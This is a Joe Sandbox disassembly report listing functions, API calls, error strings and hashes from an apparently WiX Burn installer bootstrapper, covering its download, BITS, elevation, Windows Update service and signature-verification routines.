Failed to set registration variables., xrefs: 00C91A29
Failed to open log., xrefs: 00C918ED

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: CloseHandleMessagePostWindow
String ID: Failed to check global conditions$Failed to connect to elevated parent process.$Failed to create pipes to connect to elevated parent process.$Failed to create the message window.$Failed to initialize internal cache functionality.$Failed to open log.$Failed to query registration.$Failed to set action variables.$Failed to set layout directory variable to value provided from command-line.$Failed to set registration variables.$Failed while running $WixBundleLayoutDirectory
API String ID: 3586352542-3026528549
Opcode ID: 02dc1751ba27ceb8c64d1e0fd01f9d11b860671b442eb2a5c333cabb94e8ca42
Instruction ID: 3d71027448cc9845d735ff0a26f3f135b4f7a2f172b5eda8ff04c0a37a2002ce
Opcode Fuzzy Hash: 02dc1751ba27ceb8c64d1e0fd01f9d11b860671b442eb2a5c333cabb94e8ca42
Instruction Fuzzy Hash: 1F51B031540B07BECF229AA0CC4FFAB72A9AB40755F294429F95A92150EF70EE45BB11

Function 00CB7847 Relevance: 28.2, APIs: 8, Strings: 8, Instructions: 171networkfileCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(Burn,00000000,00000000,00000000,00000000), ref: 00CB78A5
GetLastError.KERNEL32 ref: 00CB78B2
InternetCloseHandle.WININET(00000000), ref: 00CB7A0B

Part of subcall function 00CC7B23: RegCloseKey.ADVAPI32(00000000,?,00000000,?,00000000,00000000), ref: 00CC7B74

InternetSetOptionW.WININET(00000000,00000002,?,00000004), ref: 00CB791E
InternetSetOptionW.WININET(00000000,00000006,?,00000004), ref: 00CB792B
InternetSetOptionW.WININET(00000000,00000005,?,00000004), ref: 00CB7938

Part of subcall function 00CB75D3: CreateFileW.KERNEL32(?,C0000000,00000004,00000000,00000004,00000080,00000000,?,00000000,?,?,?,000000FF,?), ref: 00CB760B
Part of subcall function 00CB75D3: GetLastError.KERNEL32 ref: 00CB7619
Part of subcall function 00CB75D3: VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00CB782A
Part of subcall function 00CB75D3: CloseHandle.KERNEL32(000000FF), ref: 00CB7839

DeleteFileW.KERNEL32(?,?,000000FF,00000000,?,00000001,?,?,?,?,?,?,?,00000078,000000FF,?), ref: 00CB79E1
CloseHandle.KERNEL32(000000FF,?,000000FF,00000000,?,00000001,?,?,?,?,?,?,?,00000078,000000FF,?), ref: 00CB79F0

Strings

Burn, xrefs: 00CB78A0
Failed to open internet session, xrefs: 00CB78E1
Failed to download URL: %ls, xrefs: 00CB79C4
downloadengine.cpp, xrefs: 00CB78D7
Failed to copy download source URL., xrefs: 00CB788A
Failed to get size and time for URL: %ls, xrefs: 00CB7962
WiX\Burn, xrefs: 00CB78F3
DownloadTimeout, xrefs: 00CB78EE

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: Internet$Close$HandleOption$ErrorFileLast$CreateDeleteFreeOpenVirtual
String ID: Burn$DownloadTimeout$Failed to copy download source URL.$Failed to download URL: %ls$Failed to get size and time for URL: %ls$Failed to open internet session$WiX\Burn$downloadengine.cpp
API String ID: 328221957-1870125225
Opcode ID: 5526b0ef15be3e9f23c3ed251ec9899f48e59e01ea8a3b58fa764b6e3e48a5ab
Instruction ID: 5da93617a08321f3240c80c1c38addc032e7158c3da92c31e4df0884d0f7e8f5
Opcode Fuzzy Hash: 5526b0ef15be3e9f23c3ed251ec9899f48e59e01ea8a3b58fa764b6e3e48a5ab
Instruction Fuzzy Hash: D5510772D0411ABBDF119FD0CD85EEEBB79FB08304F10426AEA15B21A0D7329E55AB91

Function 00CB4A48 Relevance: 26.5, APIs: 1, Strings: 14, Instructions: 266COMMON

Download Yara Rule

APIs

Part of subcall function 00CC2955: GetProcessHeap.KERNEL32(?,?,?,00CC0FA3,?,00000001,?,00000000,00000000,?,?,?,00CBFD43,?,?,00000000), ref: 00CC2966
Part of subcall function 00CC2955: RtlAllocateHeap.NTDLL(00000000,?,00CC0FA3,?,00000001,?,00000000,00000000,?,?,?,00CBFD43,?,?,00000000,00000000), ref: 00CC296D

_memcpy_s.LIBCMT ref: 00CB4BC2

Strings

Failed to copy cache id for passthrough pseudo bundle., xrefs: 00CB4CC8
Failed to allocate space for burn payload inside of related bundle struct, xrefs: 00CB4C61
Failed to copy key for passthrough pseudo bundle., xrefs: 00CB4C3F
Failed to allocate memory for pseudo bundle payload hash., xrefs: 00CB4CA8
Failed to copy filename for passthrough pseudo bundle., xrefs: 00CB4C72
Failed to recreate command-line arguments., xrefs: 00CB4D0B
Failed to copy install arguments for passthrough bundle package, xrefs: 00CB4D29
Failed to copy uninstall arguments for passthrough bundle package, xrefs: 00CB4D6B
Failed to allocate space for burn package payload inside of passthrough bundle., xrefs: 00CB4A8C
Failed to copy key for passthrough pseudo bundle payload., xrefs: 00CB4C68
pseudobundle.cpp, xrefs: 00CB4A7F, 00CB4C54, 00CB4C9B
Failed to copy related arguments for passthrough bundle package, xrefs: 00CB4D47
Failed to copy download source for passthrough pseudo bundle., xrefs: 00CB4C86
Failed to copy local source path for passthrough pseudo bundle., xrefs: 00CB4C7C

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: Heap$AllocateProcess_memcpy_s
String ID: Failed to allocate memory for pseudo bundle payload hash.$Failed to allocate space for burn package payload inside of passthrough bundle.$Failed to allocate space for burn payload inside of related bundle struct$Failed to copy cache id for passthrough pseudo bundle.$Failed to copy download source for passthrough pseudo bundle.$Failed to copy filename for passthrough pseudo bundle.$Failed to copy install arguments for passthrough bundle package$Failed to copy key for passthrough pseudo bundle payload.$Failed to copy key for passthrough pseudo bundle.$Failed to copy local source path for passthrough pseudo bundle.$Failed to copy related arguments for passthrough bundle package$Failed to copy uninstall arguments for passthrough bundle package$Failed to recreate command-line arguments.$pseudobundle.cpp
API String ID: 1343786421-115096447
Opcode ID: 3f2c37052f963951f75c94c00856e3ba449a26e9ad2e6c9ddeb5c3c20964c017
Instruction ID: 7e7ad1c5cecae3db3ba23e1e8427ab51b08d1589eb4b92f84224de20439412c7
Opcode Fuzzy Hash: 3f2c37052f963951f75c94c00856e3ba449a26e9ad2e6c9ddeb5c3c20964c017
Instruction Fuzzy Hash: 4EB15774600A05EFDB15DF65C881F9ABBF4BF08340F20886AFA159B352E730E951DB80

Function 00CA0AD2 Relevance: 26.5, APIs: 1, Strings: 14, Instructions: 236COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00CA0AEE

Strings

Failed to find package: %ls, xrefs: 00CA0B37
Failed to allocate memory for ordered patches., xrefs: 00CA0C24
Failed to read ordered patch order number., xrefs: 00CA0CAA
Failed to find ordered patch package: %ls, xrefs: 00CA0CBB
Failed to read count of ordered patches., xrefs: 00CA0BE8
Failed to read UI level., xrefs: 00CA0BB0
Failed to read parent hwnd., xrefs: 00CA0B56
Failed to read variables., xrefs: 00CA0CA3
Failed to execute MSP package., xrefs: 00CA0D0B
Failed to read action., xrefs: 00CA0B15
Failed to read rollback flag., xrefs: 00CA0CE0
elevation.cpp, xrefs: 00CA0C1A
Failed to read package log., xrefs: 00CA0B7C
Failed to read ordered patch package id., xrefs: 00CA0CB1

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: _memset
String ID: Failed to allocate memory for ordered patches.$Failed to execute MSP package.$Failed to find ordered patch package: %ls$Failed to find package: %ls$Failed to read UI level.$Failed to read action.$Failed to read count of ordered patches.$Failed to read ordered patch order number.$Failed to read ordered patch package id.$Failed to read package log.$Failed to read parent hwnd.$Failed to read rollback flag.$Failed to read variables.$elevation.cpp
API String ID: 2102423945-908036492
Opcode ID: d4b1b02ef084dedea99cb2e4d4dd62fa487f0b753032585dddb5fa63529ac47e
Instruction ID: 89b4523dd9f7818f84dd0b80804295c6751e1042e28b15022202f2e98a2f039a
Opcode Fuzzy Hash: d4b1b02ef084dedea99cb2e4d4dd62fa487f0b753032585dddb5fa63529ac47e
Instruction Fuzzy Hash: 2E714072D4022EBBCB11DAD4CC45EEFBB7CAB05758F204166F901B6241DB70DE4497A1

Function 00CB808B Relevance: 26.5, APIs: 2, Strings: 13, Instructions: 207stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,00000000,?,?,?,?,00000000,?,?,?,00000000,?,00000000), ref: 00CB80A7

Strings

Failed to complete BITS job., xrefs: 00CB8267
Failed to copy download URL., xrefs: 00CB80EE
Failed to set callback interface for BITS job., xrefs: 00CB81E9
Falied to start BITS job., xrefs: 00CB824D
Failed to create BITS job., xrefs: 00CB8139
Invalid BITS engine URL: %ls, xrefs: 00CB80C9
bitsengine.cpp, xrefs: 00CB80BD, 00CB81B9
Failed to set credentials for BITS job., xrefs: 00CB815F
Failed to add file to BITS job., xrefs: 00CB817B
Failed while waiting for BITS download., xrefs: 00CB8254
Failed to download BITS job., xrefs: 00CB8246
Failed to create BITS job callback., xrefs: 00CB81C3
Failed to initialize BITS job callback., xrefs: 00CB81D2

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: lstrlen
String ID: Failed to add file to BITS job.$Failed to complete BITS job.$Failed to copy download URL.$Failed to create BITS job callback.$Failed to create BITS job.$Failed to download BITS job.$Failed to initialize BITS job callback.$Failed to set callback interface for BITS job.$Failed to set credentials for BITS job.$Failed while waiting for BITS download.$Falied to start BITS job.$Invalid BITS engine URL: %ls$bitsengine.cpp
API String ID: 1659193697-2382896028
Opcode ID: 7b991ca33cb026086d02d993f8fc946169b1c1496d9ea3338becdbdc938984b6
Instruction ID: 1615ebc9f5caebd743577c9a3483b99acdc367d2a7496088fba163c61491e740
Opcode Fuzzy Hash: 7b991ca33cb026086d02d993f8fc946169b1c1496d9ea3338becdbdc938984b6
Instruction Fuzzy Hash: 14610631A40624EFCB119F94C885EEEBBB8AF44710F11416AFD05AB351DB709E46EB91

Function 00CB733E Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 173networkstringCOMMON

Download Yara Rule

APIs

InternetCloseHandle.WININET(00000000), ref: 00CB7363
InternetCloseHandle.WININET(00000000), ref: 00CB7371
InternetConnectW.WININET(?,00000000,?,00000000,?,?,00000000,00000000), ref: 00CB73D0
lstrlenW.KERNEL32(00000000), ref: 00CB73FB
InternetSetOptionW.WININET(00000000,0000002B,00000000,00000000), ref: 00CB7408
lstrlenW.KERNEL32(00000001), ref: 00CB7411
InternetSetOptionW.WININET(00000000,0000002C,00000001,00000000), ref: 00CB741A
InternetCloseHandle.WININET(00000000), ref: 00CB748F
InternetCloseHandle.WININET(00000000), ref: 00CB749A
GetLastError.KERNEL32 ref: 00CB74B7

Strings

Failed to connect to URL: %ls, xrefs: 00CB74EB
Failed to break URL into server and resource parts., xrefs: 00CB74A8
downloadengine.cpp, xrefs: 00CB74DC
Failed to send request to URL: %ls, xrefs: 00CB7503
Failed to open internet URL: %ls, xrefs: 00CB74F7

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: Internet$CloseHandle$Optionlstrlen$ConnectErrorLast
String ID: Failed to break URL into server and resource parts.$Failed to connect to URL: %ls$Failed to open internet URL: %ls$Failed to send request to URL: %ls$downloadengine.cpp
API String ID: 1028609564-2897276973
Opcode ID: 93061a1243d7811583abbf3d9c372bafa86b2c5cce96bc041582b6e670485826
Instruction ID: 0e01325fa0b8e322aac66aec58de1ba14b921f2d394aafe181414ec14f0bf52a
Opcode Fuzzy Hash: 93061a1243d7811583abbf3d9c372bafa86b2c5cce96bc041582b6e670485826
Instruction Fuzzy Hash: C2518C32904219ABCB119FD4CD45EEE7BBAEF88701F154229FD10A72A0DB359E40AF61

Function 00C958D8 Relevance: 26.4, APIs: 2, Strings: 13, Instructions: 163COMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32(?), ref: 00C95A4F

Part of subcall function 00CC2955: GetProcessHeap.KERNEL32(?,?,?,00CC0FA3,?,00000001,?,00000000,00000000,?,?,?,00CBFD43,?,?,00000000), ref: 00CC2966
Part of subcall function 00CC2955: RtlAllocateHeap.NTDLL(00000000,?,00CC0FA3,?,00000001,?,00000000,00000000,?,?,?,00CBFD43,?,?,00000000,00000000), ref: 00CC296D

SysFreeString.OLEAUT32(?), ref: 00C95A09

Strings

Failed to select software tag nodes., xrefs: 00C95908
registration.cpp, xrefs: 00C9595D
Regid, xrefs: 00C959BB
Failed to convert SoftwareTag text to UTF-8, xrefs: 00C95AA0
Filename, xrefs: 00C959A0
`<u, xrefs: 00C95A09, 00C95A4F
Failed to get @Regid., xrefs: 00C95A92
SoftwareTag, xrefs: 00C958E6
Failed to allocate memory for software tag structs., xrefs: 00C95967
Failed to get software tag count., xrefs: 00C95922
Failed to get @Filename., xrefs: 00C95A8B
Failed to get SoftwareTag text., xrefs: 00C95A99
Failed to get next node., xrefs: 00C95A84

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: FreeHeapString$AllocateProcess
String ID: Failed to allocate memory for software tag structs.$Failed to convert SoftwareTag text to UTF-8$Failed to get @Filename.$Failed to get @Regid.$Failed to get SoftwareTag text.$Failed to get next node.$Failed to get software tag count.$Failed to select software tag nodes.$Filename$Regid$SoftwareTag$`<u$registration.cpp
API String ID: 336948655-2653194374
Opcode ID: 51b09adcd2b737cc0ad826aee4d37660896dfaa2a791f4be68153ab658d50304
Instruction ID: 9b81fcbf0b5d421948ed0886d5802e747b1c659b01f791942c218505f89483fc
Opcode Fuzzy Hash: 51b09adcd2b737cc0ad826aee4d37660896dfaa2a791f4be68153ab658d50304
Instruction Fuzzy Hash: 96518C71A00659EFCF11EFA4C8C9EBDBBB5AB08300B15467DE911B7251DA309E41AB54

Function 00CAEE8C Relevance: 26.4, APIs: 8, Strings: 7, Instructions: 144serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F,00000000,00000002,?,?,?,?,?,?,?,?,?,00CAF28B,?), ref: 00CAEEBD
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00CAF28B,?,?), ref: 00CAEECA
OpenServiceW.ADVAPI32(00000000,wuauserv,00000027,?,?,?,?,?,?,?,?,?,00CAF28B,?,?), ref: 00CAEF0B
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00CAF28B,?,?), ref: 00CAEF18
QueryServiceStatus.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,00CAF28B,?,?), ref: 00CAEF56
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00CAF28B,?,?), ref: 00CAEF60

Part of subcall function 00CAEDA9: ChangeServiceConfigW.ADVAPI32(?,000000FF,00000003,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,?,00CAEFDF,?), ref: 00CAEDC3
Part of subcall function 00CAEDA9: GetLastError.KERNEL32(?,00CAEFDF,?,00000003,?,?), ref: 00CAEDCD

CloseServiceHandle.ADVAPI32(00000000), ref: 00CAF01F
CloseServiceHandle.ADVAPI32(00000000), ref: 00CAF02A

Strings

Failed to query status of WU service., xrefs: 00CAEF8F
Failed to mark WU service to start on demand., xrefs: 00CAEFE5
Failed to read configuration for WU service., xrefs: 00CAEFC5
Failed to open WU service., xrefs: 00CAEF47
Failed to open service control manager., xrefs: 00CAEEF9
wuauserv, xrefs: 00CAEF05
msuengine.cpp, xrefs: 00CAEEEF, 00CAEF3D, 00CAEF85

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: Service$ErrorLast$CloseHandleOpen$ChangeConfigManagerQueryStatus
String ID: Failed to mark WU service to start on demand.$Failed to open WU service.$Failed to open service control manager.$Failed to query status of WU service.$Failed to read configuration for WU service.$msuengine.cpp$wuauserv
API String ID: 2017831661-301359130
Opcode ID: 09f3cb1d470600e49e2727dee634354633181152e44eba67ec44954db98bd7e4
Instruction ID: 7ab480342b3f75c6e51c64de3ad9ad50fb77f43d59f6668d274e507810e80170
Opcode Fuzzy Hash: 09f3cb1d470600e49e2727dee634354633181152e44eba67ec44954db98bd7e4
Instruction Fuzzy Hash: 29419332A4122BEFDB219BE5CC06FAEBAB4EF05714F120129F514B6250DB759D40DBE0

Function 00CC438A Relevance: 26.3, APIs: 7, Strings: 8, Instructions: 66libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00CC309E: _memset.LIBCMT ref: 00CC30C5
Part of subcall function 00CC309E: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00CC30DA
Part of subcall function 00CC309E: LoadLibraryW.KERNELBASE(?,?,00000104,00C91C3B), ref: 00CC3128
Part of subcall function 00CC309E: GetLastError.KERNEL32 ref: 00CC3134

GetProcAddress.KERNEL32(MsiDeterminePatchSequenceW,0000011C), ref: 00CC43B9
GetProcAddress.KERNEL32(MsiDetermineApplicablePatchesW), ref: 00CC43D8
GetProcAddress.KERNEL32(MsiEnumProductsExW), ref: 00CC43F7
GetProcAddress.KERNEL32(MsiGetPatchInfoExW), ref: 00CC4416
GetProcAddress.KERNEL32(MsiGetProductInfoExW), ref: 00CC4435
GetProcAddress.KERNEL32(MsiSetExternalUIRecord), ref: 00CC4454
GetProcAddress.KERNEL32(MsiSourceListAddSourceExW), ref: 00CC4473

Strings

MsiGetProductInfoExW, xrefs: 00CC442A
MsiSetExternalUIRecord, xrefs: 00CC4449
MsiDetermineApplicablePatchesW, xrefs: 00CC43CD
MsiDeterminePatchSequenceW, xrefs: 00CC43AE
MsiGetPatchInfoExW, xrefs: 00CC440B
MsiSourceListAddSourceExW, xrefs: 00CC4468
MsiEnumProductsExW, xrefs: 00CC43EC
Msi.dll, xrefs: 00CC4391

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: AddressProc$DirectoryErrorLastLibraryLoadSystem_memset
String ID: Msi.dll$MsiDetermineApplicablePatchesW$MsiDeterminePatchSequenceW$MsiEnumProductsExW$MsiGetPatchInfoExW$MsiGetProductInfoExW$MsiSetExternalUIRecord$MsiSourceListAddSourceExW
API String ID: 3669249573-1735120554
Opcode ID: b29a73ed03bd052715d8bb08fa43182fcc4c3f743f05b6eaa79ee266e48c0c2f
Instruction ID: d894350338e3d41c642cde77cb1f4dbcec74e921b6d3e1d1dc1e203f3b3b5399
Opcode Fuzzy Hash: b29a73ed03bd052715d8bb08fa43182fcc4c3f743f05b6eaa79ee266e48c0c2f
Instruction Fuzzy Hash: 6221BD719583D49ED71ADF36EE82B2C3AA9F35531532486EAE5109B2B0E3F10C429F50

Function 00CA0834 Relevance: 24.7, APIs: 1, Strings: 13, Instructions: 233COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00CA0852

Strings

Failed to find package: %ls, xrefs: 00CA08A0
Failed to allocate memory for slipstream patch actions., xrefs: 00CA09D7
Failed to allocate memory for feature actions., xrefs: 00CA0967
Failed to execute MSI package., xrefs: 00CA0A8A
Failed to read UI level., xrefs: 00CA090C
Failed to read parent hwnd., xrefs: 00CA08CA
Failed to read variables., xrefs: 00CA0A38
Failed to read action., xrefs: 00CA087E
Failed to read rollback flag., xrefs: 00CA0A5F
Failed to read slipstream action., xrefs: 00CA0A3F
elevation.cpp, xrefs: 00CA095D, 00CA09CD
Failed to read package log., xrefs: 00CA08EB
Failed to read feature action., xrefs: 00CA09E1

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: _memset
String ID: Failed to allocate memory for feature actions.$Failed to allocate memory for slipstream patch actions.$Failed to execute MSI package.$Failed to find package: %ls$Failed to read UI level.$Failed to read action.$Failed to read feature action.$Failed to read package log.$Failed to read parent hwnd.$Failed to read rollback flag.$Failed to read slipstream action.$Failed to read variables.$elevation.cpp
API String ID: 2102423945-2584093861
Opcode ID: 79d524f3a6fa7c66b40d02ae939a5ea72663f1296584dde0c47327689a8654b5
Instruction ID: 44ad7d3a1bf903f3db8679235d3a5b2043be43e8e65f395cdd869d2cb9679311
Opcode Fuzzy Hash: 79d524f3a6fa7c66b40d02ae939a5ea72663f1296584dde0c47327689a8654b5
Instruction Fuzzy Hash: 4B719C32D0021AFFDF11EED4C886DEEB7B8AB45384F210166FA15B7151E6318E51ABA1

Function 00CA8CA0 Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 155COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00CA8CFA

Part of subcall function 00CC5CB1: SetFilePointerEx.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,?,00CA819B,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000), ref: 00CC5CC7
Part of subcall function 00CC5CB1: GetLastError.KERNEL32(?,00CA819B,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00CA9C6F,00000000,00000001,?), ref: 00CC5CD1

WinVerifyTrust.WINTRUST(000000FF,00AAC56B,?,?,00000000,00000000,00000000,00000000,00000000,?,00000000), ref: 00CA8D56
WinVerifyTrust.WINTRUST(000000FF,00AAC56B,?,000000FF,00AAC56B,?,?,00000000,00000000,00000000,00000000,00000000,?,00000000), ref: 00CA8D70

Strings

Failed to get provider state from authenticode certificate., xrefs: 00CA8DF3
cache.cpp, xrefs: 00CA8D96, 00CA8DE9, 00CA8E2C
Failed to verify expected payload against actual certificate chain., xrefs: 00CA8E4E
Failed authenticode verification of payload: %ls, xrefs: 00CA8DA3
Failed to get signer chain from authenticode certificate., xrefs: 00CA8E36
Failed to move file pointer to beginning of file., xrefs: 00CA8D12

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: TrustVerify$ErrorFileLastPointer_memset
String ID: Failed authenticode verification of payload: %ls$Failed to get provider state from authenticode certificate.$Failed to get signer chain from authenticode certificate.$Failed to move file pointer to beginning of file.$Failed to verify expected payload against actual certificate chain.$cache.cpp
API String ID: 2460818389-4294895434
Opcode ID: 78f0009b20fa551e04c35dd027e43f43e639c3ada854db81c7530ee4b2a4e057
Instruction ID: cef957fbb9ea2fdc477156d2d95cacaca98b7e5a365f538e647033914b228d56
Opcode Fuzzy Hash: 78f0009b20fa551e04c35dd027e43f43e639c3ada854db81c7530ee4b2a4e057
Instruction Fuzzy Hash: 1541F972D40216ABCB21DBE9CC45EDFBBB8EF55714F10452AF514F7291DB708A0897A0

Function 00CA6102 Relevance: 22.9, APIs: 9, Strings: 4, Instructions: 151memoryCOMMON

Download Yara Rule

APIs

GdipAlloc.GDIPLUS(00000010), ref: 00CA6122

Part of subcall function 00CA60D2: GdipCreateBitmapFromResource.GDIPLUS(?,?,00000000), ref: 00CA60ED

GetCursorPos.USER32(?), ref: 00CA61BA
MonitorFromPoint.USER32(?,?,00000002), ref: 00CA61D0
_memset.LIBCMT ref: 00CA61EA
GetMonitorInfoW.USER32(00000000,?), ref: 00CA61FA
CreateDCW.GDI32(DISPLAY,?,00000000,00000000), ref: 00CA6211
GetDeviceCaps.GDI32(00000000,00000058), ref: 00CA6226
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00CA622E
ReleaseDC.USER32(00000000,00000000), ref: 00CA6255

Strings

splashscreen.cpp, xrefs: 00CA614A, 00CA617B
DISPLAY, xrefs: 00CA620C
Failed to load the splash screen bitmap., xrefs: 00CA6185
Failed to find the splash screen bitmap., xrefs: 00CA6157

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

